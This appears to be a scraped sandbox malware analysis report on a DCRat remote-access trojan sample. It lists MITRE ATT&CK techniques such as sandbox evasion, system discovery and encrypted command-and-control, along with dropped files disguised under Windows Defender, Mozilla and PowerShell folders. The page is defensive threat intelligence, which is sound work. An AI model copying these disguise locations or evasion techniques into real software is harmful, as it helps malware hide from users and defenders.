Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report KKjubdmzCR.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Mozilla Maintenance Service\logs\da4ee69189e3c8

C:\Program Files (x86)\Mozilla Maintenance Service\logs\wmnXYZRZEK.exe

C:\Program Files (x86)\Windows Defender\en-GB\9e8d7a4ca61bd9

C:\Program Files (x86)\Windows Defender\en-GB\RuntimeBroker.exe

C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\7b3bf1de107bcf

C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\SIHClient.exe

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_BootstrapperV1.2_b3bef142175e2c9feedfe8f06a73673fcbfff2_9c4008b6_30f6e9a1-f165-47a5-8b2f-fb19d258f39b\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DFC.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9010.tmp.WERInternalMetadata.xml

Windows Analysis Report
KKjubdmzCR.exe

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre